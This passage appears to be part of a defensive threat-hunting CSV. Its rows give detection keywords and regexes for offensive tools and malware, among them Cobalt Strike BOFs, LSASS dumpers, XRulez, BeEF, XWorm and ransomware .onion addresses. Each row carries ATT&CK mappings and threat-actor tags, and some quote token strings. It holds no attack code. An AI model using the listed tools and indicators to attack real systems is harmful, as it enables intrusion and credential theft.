"*xoxb-2144924547920-3393858142400-qEIcN8hBt0WgwRaJImILqMAj*",".{0,1000}xoxb\-2144924547920\-3393858142400\-qEIcN8hBt0WgwRaJImILqMAj.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","#content","slack id","10","10","N/A","N/A","N/A","N/A","63277"
"*xpipe \\*",".{0,1000}xpipe\s\\\\.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF to list Windows Pipes & return their Owners & DACL Permissions","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/boku7/xPipe","1","0","N/A","N/A","10","10","77","23","2023-03-08T15:51:47Z","2021-12-07T22:56:30Z","63278"
"*xpipe*lsass*",".{0,1000}xpipe.{0,1000}lsass.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF to list Windows Pipes & return their Owners & DACL Permissions","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/boku7/xPipe","1","1","N/A","N/A","10","10","77","23","2023-03-08T15:51:47Z","2021-12-07T22:56:30Z","63279"
"*xpipe.cna*",".{0,1000}xpipe\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF to list Windows Pipes & return their Owners & DACL Permissions","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/boku7/xPipe","1","1","N/A","N/A","10","10","77","23","2023-03-08T15:51:47Z","2021-12-07T22:56:30Z","63280"
"*xpn*ntlmquic*",".{0,1000}xpn.{0,1000}ntlmquic.{0,1000}","offensive_tool_keyword","ntlmquic","POC tools for exploring SMB over QUIC protocol","T1210.002 - T1210.003 - T1210.004","TA0001","N/A","N/A","Exploitation tool","https://github.com/xpn/ntlmquic","1","1","N/A","network exploitation tool","6","2","122","15","2022-04-06T11:22:11Z","2022-04-05T13:01:02Z","63281"
"*xpn/AppProxyC2*",".{0,1000}xpn\/AppProxyC2.{0,1000}","offensive_tool_keyword","AppProxyC2","simple POC to show how to tunnel traffic through Azure Application Proxy","T1090 - T1572 - T1071","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/xpn/AppProxyC2","1","1","N/A","N/A","9","10","69","18","2021-04-21T13:02:15Z","2021-04-21T10:46:16Z","63282"
"*xrdp.c*",".{0,1000}xrdp\.c.{0,1000}","offensive_tool_keyword","xrdp","xrdp provides a graphical login to remote machines using Microsoft Remote Desktop Protocol (RDP). xrdp accepts connections from a variety of RDP clients: FreeRDP. rdesktop. NeutrinoRDP and Microsoft Remote Desktop Client (for Windows. Mac OS. iOS and Android).can be used by attacker","T1021.003 - T1021.002","TA0003 - TA0006 - TA0011","N/A","GOLD EVERGREEN - Common Raven","Exploitation tool","https://github.com/neutrinolabs/xrdp","1","0","N/A","N/A","N/A","10","6085","1722","2025-04-22T13:58:59Z","2011-04-25T14:31:17Z","63283"
"*Xre0uS/MultiDump*",".{0,1000}Xre0uS\/MultiDump.{0,1000}","offensive_tool_keyword","MultiDump","MultiDump is a post-exploitation tool for dumping and extracting LSASS memory discreetly","T1003 - T1564.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/Xre0uS/MultiDump","1","1","N/A","N/A","10","6","510","66","2025-03-28T10:40:27Z","2024-02-02T05:56:29Z","63284"
"*xRET2pwn/PickleC2*",".{0,1000}xRET2pwn\/PickleC2.{0,1000}","offensive_tool_keyword","PickleC2","PickleC2 is a post-exploitation and Lateral Movements framework","T1059.006 - T1021 - T1071 - T1550 - T1560 - T1570","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/xRET2pwn/PickleC2","1","1","N/A","N/A","10","10","91","20","2021-07-26T21:12:04Z","2021-07-13T09:16:19Z","63285"
"*XRMod_h64e.exe*",".{0,1000}XRMod_h64e\.exe.{0,1000}","offensive_tool_keyword","Xrulez","XRulez is a Windows executable that can add malicious rules to Outlook from the command line of a compromised host.","T1078 - T1105 - T1059 - T1566","TA0002 -  TA0003 - TA0005 - TA0011","N/A","N/A","Persistence","https://github.com/FSecureLABS/Xrulez","1","1","N/A","N/A","10","2","162","45","2018-12-11T16:33:08Z","2016-08-31T10:10:10Z","63286"
"*Xrulez + XRMod.rwdi.binaries.zip*",".{0,1000}Xrulez\s\+\sXRMod\.rwdi\.binaries\.zip.{0,1000}","offensive_tool_keyword","Xrulez","XRulez is a Windows executable that can add malicious rules to Outlook from the command line of a compromised host.","T1078 - T1105 - T1059 - T1566","TA0002 -  TA0003 - TA0005 - TA0011","N/A","N/A","Persistence","https://github.com/FSecureLABS/Xrulez","1","0","N/A","N/A","10","2","162","45","2018-12-11T16:33:08Z","2016-08-31T10:10:10Z","63287"
"*Xrulez + XRMod.x64.binaries.zip*",".{0,1000}Xrulez\s\+\sXRMod\.x64\.binaries\.zip.{0,1000}","offensive_tool_keyword","Xrulez","XRulez is a Windows executable that can add malicious rules to Outlook from the command line of a compromised host.","T1078 - T1105 - T1059 - T1566","TA0002 -  TA0003 - TA0005 - TA0011","N/A","N/A","Persistence","https://github.com/FSecureLABS/Xrulez","1","0","N/A","N/A","10","2","162","45","2018-12-11T16:33:08Z","2016-08-31T10:10:10Z","63288"
"*Xrulez + XRMod.x86.binaries.zip*",".{0,1000}Xrulez\s\+\sXRMod\.x86\.binaries\.zip.{0,1000}","offensive_tool_keyword","Xrulez","XRulez is a Windows executable that can add malicious rules to Outlook from the command line of a compromised host.","T1078 - T1105 - T1059 - T1566","TA0002 -  TA0003 - TA0005 - TA0011","N/A","N/A","Persistence","https://github.com/FSecureLABS/Xrulez","1","0","N/A","N/A","10","2","162","45","2018-12-11T16:33:08Z","2016-08-31T10:10:10Z","63289"
"*XRulez binaries.zip*",".{0,1000}XRulez\sbinaries\.zip.{0,1000}","offensive_tool_keyword","Xrulez","XRulez is a Windows executable that can add malicious rules to Outlook from the command line of a compromised host.","T1078 - T1105 - T1059 - T1566","TA0002 -  TA0003 - TA0005 - TA0011","N/A","N/A","Persistence","https://github.com/FSecureLABS/Xrulez","1","0","N/A","N/A","10","2","162","45","2018-12-11T16:33:08Z","2016-08-31T10:10:10Z","63290"
"*XRulez.%2B.XRMod.rwdi.binaries.zip*",".{0,1000}XRulez\.\%2B\.XRMod\.rwdi\.binaries\.zip.{0,1000}","offensive_tool_keyword","Xrulez","XRulez is a Windows executable that can add malicious rules to Outlook from the command line of a compromised host.","T1078 - T1105 - T1059 - T1566","TA0002 -  TA0003 - TA0005 - TA0011","N/A","N/A","Persistence","https://github.com/FSecureLABS/Xrulez","1","1","N/A","N/A","10","2","162","45","2018-12-11T16:33:08Z","2016-08-31T10:10:10Z","63291"
"*XRulez.%2B.XRMod.x64.binaries.zip*",".{0,1000}XRulez\.\%2B\.XRMod\.x64\.binaries\.zip.{0,1000}","offensive_tool_keyword","Xrulez","XRulez is a Windows executable that can add malicious rules to Outlook from the command line of a compromised host.","T1078 - T1105 - T1059 - T1566","TA0002 -  TA0003 - TA0005 - TA0011","N/A","N/A","Persistence","https://github.com/FSecureLABS/Xrulez","1","1","N/A","N/A","10","2","162","45","2018-12-11T16:33:08Z","2016-08-31T10:10:10Z","63292"
"*XRulez.%2B.XRMod.x86.binaries.zip*",".{0,1000}XRulez\.\%2B\.XRMod\.x86\.binaries\.zip.{0,1000}","offensive_tool_keyword","Xrulez","XRulez is a Windows executable that can add malicious rules to Outlook from the command line of a compromised host.","T1078 - T1105 - T1059 - T1566","TA0002 -  TA0003 - TA0005 - TA0011","N/A","N/A","Persistence","https://github.com/FSecureLABS/Xrulez","1","1","N/A","N/A","10","2","162","45","2018-12-11T16:33:08Z","2016-08-31T10:10:10Z","63293"
"*XRulez.+.XRMod.x64.binaries*",".{0,1000}XRulez\.\+\.XRMod\.x64\.binaries.{0,1000}","offensive_tool_keyword","Xrulez","XRulez is a Windows executable that can add malicious rules to Outlook from the command line of a compromised host.","T1078 - T1105 - T1059 - T1566","TA0002 -  TA0003 - TA0005 - TA0011","N/A","N/A","Persistence","https://github.com/FSecureLABS/Xrulez","1","0","N/A","N/A","10","2","162","45","2018-12-11T16:33:08Z","2016-08-31T10:10:10Z","63294"
"*XRulez.exe *",".{0,1000}XRulez\.exe\s.{0,1000}","offensive_tool_keyword","Xrulez","XRulez is a Windows executable that can add malicious rules to Outlook from the command line of a compromised host.","T1078 - T1105 - T1059 - T1566","TA0002 -  TA0003 - TA0005 - TA0011","N/A","N/A","Persistence","https://github.com/FSecureLABS/Xrulez","1","0","N/A","N/A","10","2","162","45","2018-12-11T16:33:08Z","2016-08-31T10:10:10Z","63295"
"*XRulez_h64d.dll*",".{0,1000}XRulez_h64d\.dll.{0,1000}","offensive_tool_keyword","Xrulez","XRulez is a Windows executable that can add malicious rules to Outlook from the command line of a compromised host.","T1078 - T1105 - T1059 - T1566","TA0002 -  TA0003 - TA0005 - TA0011","N/A","N/A","Persistence","https://github.com/FSecureLABS/Xrulez","1","1","N/A","N/A","10","2","162","45","2018-12-11T16:33:08Z","2016-08-31T10:10:10Z","63296"
"*XRulez_h64e.exe*",".{0,1000}XRulez_h64e\.exe.{0,1000}","offensive_tool_keyword","Xrulez","XRulez is a Windows executable that can add malicious rules to Outlook from the command line of a compromised host.","T1078 - T1105 - T1059 - T1566","TA0002 -  TA0003 - TA0005 - TA0011","N/A","N/A","Persistence","https://github.com/FSecureLABS/Xrulez","1","1","N/A","N/A","10","2","162","45","2018-12-11T16:33:08Z","2016-08-31T10:10:10Z","63297"
"*XRulez_rwdi86d.dll*",".{0,1000}XRulez_rwdi86d\.dll.{0,1000}","offensive_tool_keyword","Xrulez","XRulez is a Windows executable that can add malicious rules to Outlook from the command line of a compromised host.","T1078 - T1105 - T1059 - T1566","TA0002 -  TA0003 - TA0005 - TA0011","N/A","N/A","Persistence","https://github.com/FSecureLABS/Xrulez","1","1","N/A","N/A","10","2","162","45","2018-12-11T16:33:08Z","2016-08-31T10:10:10Z","63298"
"*XRulezDll_rwdi64.dll*",".{0,1000}XRulezDll_rwdi64\.dll.{0,1000}","offensive_tool_keyword","Xrulez","XRulez is a Windows executable that can add malicious rules to Outlook from the command line of a compromised host.","T1078 - T1105 - T1059 - T1566","TA0002 -  TA0003 - TA0005 - TA0011","N/A","N/A","Persistence","https://github.com/FSecureLABS/Xrulez","1","1","N/A","N/A","10","2","162","45","2018-12-11T16:33:08Z","2016-08-31T10:10:10Z","63299"
"*xs.exe -connect *",".{0,1000}xs\.exe\s\-connect\s.{0,1000}","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca - Black Basta","Exploitation tool","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","63300"
"*xscreensaver_log_priv_esc*",".{0,1000}xscreensaver_log_priv_esc.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","63301"
"*xshell_xftp_password.md*",".{0,1000}xshell_xftp_password\.md.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","63302"
"*XSpear -u *",".{0,1000}XSpear\s\-u\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","63303"
"*xspy -display*",".{0,1000}xspy\s\-display.{0,1000}","offensive_tool_keyword","xspy","Keylogger Monitors keystrokes even the keyboard is grabbed.","T1056 - T1059 - T1007 - T1113","TA0006 - TA0002 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/mnp/xspy/blob/master/xspy.c","1","0","N/A","N/A","N/A","1","25","14","2018-03-19T12:16:25Z","2011-07-26T18:37:00Z","63304"
"*xsrfprobe -u *",".{0,1000}xsrfprobe\s\-u\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","63305"
"*xsser -u * -g */login?password=* --Coo*",".{0,1000}xsser\s\-u\s.{0,1000}\s\-g\s.{0,1000}\/login\?password\=.{0,1000}\s\-\-Coo.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","63306"
"*XSS-labs*",".{0,1000}XSS\-labs.{0,1000}","offensive_tool_keyword","xss-labs","small set of PHP scripts to practice exploiting XSS and CSRF injection vulns","T1059.003 - T1190 - T1600","TA0002 - TA0007  - ","N/A","N/A","Vulnerability Scanner","https://github.com/paralax/xss-labs","1","1","N/A","N/A","N/A","1","60","27","2017-12-22T19:38:15Z","2016-03-24T19:43:37Z","63307"
"*XSS-Payloads*",".{0,1000}XSS\-Payloads.{0,1000}","offensive_tool_keyword","XSS-Payloads","A fine collection of selected javascript payloads.","T1059 - T1068 - T1071 - T1506","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Vulnerability Scanner","http://www.xss-payloads.com/","1","1","N/A","N/A","N/A","8","N/A","N/A","N/A","N/A","63308"
"*xssrays.js*",".{0,1000}xssrays\.js.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","1","N/A","N/A","8","10","10174","2256","2025-04-22T14:01:20Z","2011-11-23T06:53:25Z","63309"
"*xssrays.rb*",".{0,1000}xssrays\.rb.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","1","N/A","N/A","8","10","10174","2256","2025-04-22T14:01:20Z","2011-11-23T06:53:25Z","63310"
"*xssrays_spec.rb*",".{0,1000}xssrays_spec\.rb.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","1","N/A","N/A","8","10","10174","2256","2025-04-22T14:01:20Z","2011-11-23T06:53:25Z","63311"
"*xssraysdetail.rb*",".{0,1000}xssraysdetail\.rb.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","1","N/A","N/A","8","10","10174","2256","2025-04-22T14:01:20Z","2011-11-23T06:53:25Z","63312"
"*xssraysscan.rb*",".{0,1000}xssraysscan\.rb.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","1","N/A","N/A","8","10","10174","2256","2025-04-22T14:01:20Z","2011-11-23T06:53:25Z","63313"
"*XSStrike*",".{0,1000}XSStrike.{0,1000}","offensive_tool_keyword","XSStrike","Advanced XSS detection and exploitation suite.","T1189","TA0001","N/A","N/A","Exploitation tool","https://github.com/UltimateHackers/XSStrike","1","0","N/A","N/A","N/A","10","13851","1957","2025-03-17T11:26:56Z","2017-06-26T07:24:44Z","63314"
"*xsukax-Wordlist-All.7z*",".{0,1000}xsukax\-Wordlist\-All\.7z.{0,1000}","offensive_tool_keyword","weakpass","Weakpass collection of tools for bruteforce and hashcracking","T1110 - T1201","TA0006 - TA0002","N/A","Black Basta","Credential Access","https://github.com/zzzteph/weakpass","1","1","N/A","N/A","10","6","541","55","2025-04-08T19:50:48Z","2021-08-29T13:07:37Z","63315"
"*xterm -e masscan*",".{0,1000}xterm\s\-e\smasscan.{0,1000}","offensive_tool_keyword","masscan","TCP port scanner. spews SYN packets asynchronously. scanning entire Internet in under 5 minutes.","T1046","TA0007","N/A","Black Basta - Unit 29155 - Akira - EMBER BEAR","Reconnaissance","https://github.com/robertdavidgraham/masscan","1","0","N/A","N/A","N/A","10","24345","3118","2024-12-13T12:22:18Z","2013-07-28T05:35:33Z","63316"
"*xtr4nge/FruityC2*",".{0,1000}xtr4nge\/FruityC2.{0,1000}","offensive_tool_keyword","FruityC2","ruityC2 is a post-exploitation framework based on the deployment of agents on compromised machines","T1090 - T1572 - T1071.001","TA0010 - TA0011 - TA0008 - TA0005","N/A","MuddyWater","C2","https://github.com/xtr4nge/FruityC2","1","1","N/A","https://documents.trendmicro.com/assets/white_papers/wp_new_muddywater_findings_uncovered.pdf","10","10","208","67","2017-12-04T17:05:23Z","2017-01-11T17:27:45Z","63317"
"*xvt-void/EnableAllTokenPrivs*",".{0,1000}xvt\-void\/EnableAllTokenPrivs.{0,1000}","offensive_tool_keyword","EnableAllTokenPrivs","Enable or Disable TokenPrivilege(s)","T1134 - T1055","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/xvt-void/EnableAllTokenPrivs","1","1","N/A","N/A","7","1","13","5","2024-05-17T12:43:43Z","2024-02-17T15:39:25Z","63318"
"*xw7au5pnwtl6lozbsudkmyd32n6gnqdngitjdppybudan3x3pjgpmpid.onion*",".{0,1000}xw7au5pnwtl6lozbsudkmyd32n6gnqdngitjdppybudan3x3pjgpmpid\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","63319"
"*XWorm_RAT_V2._1.data.*",".{0,1000}XWorm_RAT_V2\._1\.data\..{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","0","N/A","N/A","10","","N/A","","","","63321"
"*XWorm-v5-Remote-Access-Tool*",".{0,1000}XWorm\-v5\-Remote\-Access\-Tool.{0,1000}","offensive_tool_keyword","Rhadamanthys","Fake Xworm - Rhadamanthys infostealer","T1583 - T1110 - T1082 - T1505 - T1567 - T1573","TA0006 - TA0003 - TA0004 - TA0005 - TA0009","N/A","N/A","Malware","https://github.com/koyaxZ/XWorm-v5-Remote-Access-Tool","1","1","N/A","N/A","10","","N/A","","","","63322"
"*XXEinjector*",".{0,1000}XXEinjector.{0,1000}","offensive_tool_keyword","XXEinjector","XXEinjector automates retrieving files using direct and out of band methods. Directory listing only works in Java applications. Bruteforcing method needs to be used for other applications.","T1573.001 - T1573.002 - T1574","TA0007  - ","N/A","N/A","Vulnerability Scanner","https://github.com/enjoiz/XXEinjector","1","1","N/A","N/A","10","10","1619","319","2024-12-01T15:25:27Z","2015-05-16T10:56:14Z","63324"
"*xxePayloads.ini*",".{0,1000}xxePayloads\.ini.{0,1000}","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","N/A","10","1372","212","2025-04-16T11:41:00Z","2020-06-06T20:17:55Z","63325"
"*XX-PHISHING-LINK-XX*",".{0,1000}XX\-PHISHING\-LINK\-XX.{0,1000}","offensive_tool_keyword","bitb","Browser templates for Browser In The Browser (BITB) attack","T1056.001 - T1134 - T1090","TA0005 - TA0006 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/mrd0x/BITB","1","0","N/A","N/A","10","10","2823","474","2024-01-26T05:20:18Z","2022-03-15T16:51:39Z","63326"
"*X-YSOSERIAL-NET*",".{0,1000}X\-YSOSERIAL\-NET.{0,1000}","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/pwntester/ysoserial.net","1","1","N/A","N/A","10","10","3385","493","2024-12-23T20:59:47Z","2017-09-18T17:48:08Z","63327"
"*xZF7fvaGD6p2yeLyf9i7O9gBBHk05B0u*",".{0,1000}xZF7fvaGD6p2yeLyf9i7O9gBBHk05B0u.{0,1000}","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001  -  T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","0","N/A","N/A","10","10","1161","119","2025-02-03T12:03:19Z","2021-02-09T15:54:23Z","63328"
